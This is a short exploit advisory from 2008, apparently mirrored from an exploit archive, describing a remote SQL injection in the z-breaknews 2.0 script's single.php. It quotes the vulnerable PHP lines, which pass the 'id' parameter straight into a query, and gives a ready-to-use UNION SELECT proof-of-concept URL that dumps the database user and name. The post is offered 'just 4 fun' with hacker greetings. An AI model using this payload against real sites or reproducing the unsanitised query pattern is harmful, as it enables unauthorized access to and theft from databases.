[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability
# Published : 2008-08-26
# Author : cOndemned
# Previous Title : YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
# Next Title : Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability
z???########################################################################################
#
# Name : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, t0pP8uZz, 0in, suN8Hclf & All of my friends
#
########################################################################################
source of single.php :
[ ... ]
4. @mysql_select_db("$dbName")or die("???o ???????3 ?¢?±???‘?????? ?????§?3 ?¤???-?-?±?‘ ");
5. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id']));
6. echo $row['date'] ?></title>
[ ... ]
36. $row=mysql_fetch_array(mysql_query("SELECT * FROM $table WHERE id=".$_GET['id']));
[ ... ]
41. <td widht=100% ALIGN="left" valign='top'><h1>$row[date]</h1>
[ ... ]
proof of concept (admins login & password are not in database, so... )
http://[host]/single.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database()),3,4,5/*
^ This will print requested information between <title> (line 6) and <h1> (line 41) tags
just 4 fun
# www.Syue.com [2008-08-26]